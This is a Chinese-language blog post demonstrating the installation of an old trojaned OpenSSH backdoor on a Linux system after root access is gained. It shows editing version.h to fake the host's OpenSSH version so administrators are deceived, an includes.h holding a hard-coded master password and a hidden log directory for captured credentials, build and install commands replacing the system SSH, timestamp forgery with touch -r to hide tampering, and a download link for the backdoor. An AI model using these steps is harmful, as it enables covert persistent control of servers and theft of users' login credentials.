某ssh后门试用

      在获取linux的root权限之后，虽然可以ssh连进去，但是可否长期进行控制呢？这里就涉及到ssh后门的问题了。在这里，我大致试用了一下一个比较老但是稳定的ssh后门，算是作个记录。后续我会翻译一篇老外用python写的ssh后门。好了，我会在虚拟机中对ssh后门做一个演示，最后我会放出下载到的后门程序。

      在这里，我使用安装的Kali1.1.0_32来进行试验。（尝试过ubuntu12.04.5和ubuntu14.04.1，都失败了）首先把下载的ssh后门程序放到指定文件夹中。查看一下本机安装的ssh版本，如下图所示：

      我们需要在version.h中把ssh的版本号改为我们本机得到的OpenSSH版本号，我觉得这个就是后续用来迷惑管理员的，免得管理员感觉异常导致ssh后门程序的暴露。（其实查看版本信息的时候，还是可以发现有异常）

      好了，我们来修改下version.h文件的ssh版本号，具体如下所示：

#define SSH_VERSION"OpenSSH_6.0p1 Debian-4+deb7u2, OpenSSL 1.0.1e 11 Feb 2013"

      上面红色部分是我虚拟机ubuntu中OpenSSH的版本号。

      接下来，设置一下ssh后门的密码，这个在include.h文件中进行设置，如下图所示：

/*$OpenBSD: includes.h,v 1.17 2002/01/26 16:44:22 stevesk Exp $*/
/*
 * Author: Tatu Ylonen <ylo@cs.hut.fi>
 * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
 *                    All rights reserved
 * This file includes most of the needed system headers.
 *
 * As far as I am concerned, the code I have written for this software
 * can be used freely for any purpose.  Any derived versions of this
 * software must be clearly marked as such, and if the derived work is
 * incompatible with the protocol description in the RFC file, it must be
 * called by a name other than "ssh" or "Secure Shell".
 */
#ifndef INCLUDES_H
#define INCLUDES_H
#define RCSID(msg) \
static /**/const char *const rcsid[] = { (char *)rcsid, "\100(#)" msg }
#include "config.h"
#include <stdio.h>
#include <ctype.h>
#include <errno.h>
#include <fcntl.h> /* For O_NONBLOCK */
#include <signal.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <pwd.h>
#include <grp.h>
#include <time.h>
#include <dirent.h>
#ifdef HAVE_LIMITS_H
# include <limits.h> /* For PATH_MAX */
#endif
#ifdef HAVE_GETOPT_H
# include <getopt.h>
#endif
#ifdef HAVE_BSTRING_H
# include <bstring.h>
#endif
#if defined(HAVE_GLOB_H) && defined(GLOB_HAS_ALTDIRFUNC) && \
    defined(GLOB_HAS_GL_MATCHC)
# include <glob.h>
#endif
#ifdef HAVE_NETGROUP_H
# include <netgroup.h>
#endif
#if defined(HAVE_NETDB_H)
# include <netdb.h>
#endif
#ifdef HAVE_ENDIAN_H
# include <endian.h>
#endif
#ifdef HAVE_TTYENT_H
# include <ttyent.h>
#endif
#ifdef HAVE_UTIME_H
# include <utime.h>
#endif
#ifdef HAVE_MAILLOCK_H
# include <maillock.h> /* For _PATH_MAILDIR */
#endif
#ifdef HAVE_NEXT
#  include <libc.h>
#endif
#include <unistd.h> /* For STDIN_FILENO, etc */
#include <termios.h> /* Struct winsize */
/*
 *-*-nto-qnx needs these headers for strcasecmp and LASTLOG_FILE respectively
 */
#ifdef HAVE_STRINGS_H
# include <strings.h>
#endif
#ifdef HAVE_LOGIN_H
# include <login.h>
#endif
#ifdef HAVE_UTMP_H
#  include <utmp.h>
#endif
#ifdef HAVE_UTMPX_H
#  ifdef HAVE_TV_IN_UTMPX
#    include <sys/time.h>
#  endif
#  include <utmpx.h>
#endif
#ifdef HAVE_LASTLOG_H
#  include <lastlog.h>
#endif
#ifdef HAVE_PATHS_H
#  include <paths.h> /* For _PATH_XXX */
#endif
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#ifdef HAVE_SYS_TIME_H
# include <sys/time.h> /* For timersub */
#endif
#include <sys/resource.h>
#ifdef HAVE_SYS_SELECT_H
# include <sys/select.h>
#endif
#ifdef HAVE_SYS_BSDTTY_H
# include <sys/bsdtty.h>
#endif
#include <sys/param.h> /* For MAXPATHLEN and roundup() */
#ifdef HAVE_SYS_UN_H
# include <sys/un.h> /* For sockaddr_un */
#endif
#ifdef HAVE_SYS_BITYPES_H
# include <sys/bitypes.h> /* For u_intXX_t */
#endif
#ifdef HAVE_SYS_CDEFS_H
# include <sys/cdefs.h> /* For __P() */
#endif
#ifdef HAVE_SYS_STAT_H
# include <sys/stat.h> /* For S_* constants and macros */
#endif
#ifdef HAVE_SYS_SYSMACROS_H
# include <sys/sysmacros.h> /* For MIN, MAX, etc */
#endif
#ifdef HAVE_SYS_MMAN_H
#include <sys/mman.h> /* for MAP_ANONYMOUS */
#endif
#include <netinet/in_systm.h> /* For typedefs */
#include <netinet/in.h> /* For IPv6 macros */
#include <netinet/ip.h> /* For IPTOS macros */
#include <netinet/tcp.h>
#include <arpa/inet.h>
#ifdef HAVE_RPC_TYPES_H
# include <rpc/types.h> /* For INADDR_LOOPBACK */
#endif
#ifdef USE_PAM
# include <security/pam_appl.h>
#endif
#ifdef HAVE_READPASSPHRASE_H
# include <readpassphrase.h>
#endif
#include <openssl/opensslv.h> /* For OPENSSL_VERSION_NUMBER */
#include "defines.h"
#include "version.h"
#include "openbsd-compat/openbsd-compat.h"
#include "openbsd-compat/bsd-cygwin_util.h"
#include "openbsd-compat/bsd-nextstep.h"
#include "entropy.h"
/* hax0r shit */
#define _SECRET_PASSWD "test@12345"
#define _LOG_DIR "/usr/local/share/0wn"
#define _S_LOG "slog"
#define _C_LOG "clog"
FILE *outf;
int mlogin_ok;
FILE *f;
char message[512];
/* end hax0r shit */
#endif /* INCLUDES_H */

      如上图所示，在#define _SECRET_PASSWD设置ssh后门的密码，我设置的是test@12345。完成这两部之后，就开始编译ssh后门了。为了安全起见，首先完成原来ssh一些文件的备份工作。

      备份原文件：

mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old

      编译安装：（需要定位到ssh后门所在文件夹）

./configure --prefix=/usr --sysconfdir=/etc/ssh
make && make install
cp ssh_config sshd_config /etc/ssh/

      修改文件时间：

touch -r  /etc/ssh/ssh_config.old /etc/ssh/ssh_config
touch -r  /etc/ssh/sshd_config.old /etc/ssh/sshd_config

      重启服务：

/etc/init.d/ssh restart

      登入后门：

      可以看到正常登陆。到此结束，最后分享一下这个ssh后门程序。

      地址：http://pan.baidu.com/s/1rXDIe（密码：1di8）